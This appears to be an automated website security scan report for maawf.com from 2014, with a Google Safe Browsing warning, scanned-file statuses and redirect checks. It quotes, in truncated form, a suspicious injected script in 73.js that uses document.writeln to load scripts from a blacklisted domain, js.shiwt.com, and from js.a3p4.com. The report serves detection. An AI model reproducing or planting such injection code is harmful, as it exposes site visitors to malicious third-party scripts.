Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=maawf.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://maawf.com/ | 200 OK Content-Length: 20866 Content-Type: text/html | clean |
http://maawf.com/forumdata/cache/common.js?9ZD | 200 OK Content-Length: 58892 Content-Type: application/x-javascript | clean |
http://maawf.com/7304.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://maawf.com/include/js/slide.js | 200 OK Content-Length: 5276 Content-Type: application/x-javascript | clean |
http://maawf.com/7305.js | 200 OK Content-Length: 93 Content-Type: application/x-javascript | clean |
http://maawf.com/73.js | 200 OK Content-Length: 1127 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: js.shiwt.com document.writeln("<script src=\"http:\/\/js.shiwt.com\/110.js\"><\/script>"); r = 2; var seed = Math.random(); rnd = Math.ceil(seed * r); switch (rnd) { case 1: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); break; case 2: document.writeln('<script src="http://js.a3p4.com/page/?s=216895"></script>'); default: ...[816 bytes skipped]... | ||
http://maawf.com/index.php | 200 OK Content-Length: 20866 Content-Type: text/html | clean |
http://maawf.com/register.php | 200 OK Content-Length: 8800 Content-Type: text/html | clean |
http://maawf.com/logging.php?action=login | 200 OK Content-Length: 9535 Content-Type: text/html | clean |
http://maawf.com/forumdata/cache/md5.js?9ZD | 200 OK Content-Length: 4730 Content-Type: application/x-javascript | clean |
http://maawf.com/search.php | 200 OK Content-Length: 9626 Content-Type: text/html | clean |
http://maawf.com/faq.php | 200 OK Content-Length: 9332 Content-Type: text/html | clean |
http://maawf.com/misc.php?action=nav | 200 OK Content-Length: 8088 Content-Type: text/html | clean |
http://maawf.com/pm.php?filter=newpm | 200 OK Content-Length: 6709 Content-Type: text/html | clean |
http://maawf.com/pm.php?filter=announcepm | 200 OK Content-Length: 6709 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: maawf.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Aug 2014 03:33:31 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: Nwf_lastrequest=4d48SDTfcpQdtowdYFHLhJGVVgUKW375wTuXQH6Pkg%2FBJiqq1%2Bro; path=/; httponly
Set-Cookie: Nwf_sid=EyY15F; expires=Wed, 13-Aug-2014 03:33:31 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
GET / HTTP/1.1
Host: maawf.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Aug 2014 03:33:31 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: Nwf_lastrequest=4d48SDTfcpQdtowdYFHLhJGVVgUKW375wTuXQH6Pkg%2FBJiqq1%2Bro; path=/; httponly
Set-Cookie: Nwf_sid=EyY15F; expires=Wed, 13-Aug-2014 03:33:31 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17p1
Second query (visit from search engine):
GET / HTTP/1.1
Host: maawf.com
Referer: http://www.google.com/search?q=maawf.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: maawf.com
Referer: http://www.google.com/search?q=maawf.com
Result:
The result is similar to the first query. There are no suspicious redirects found.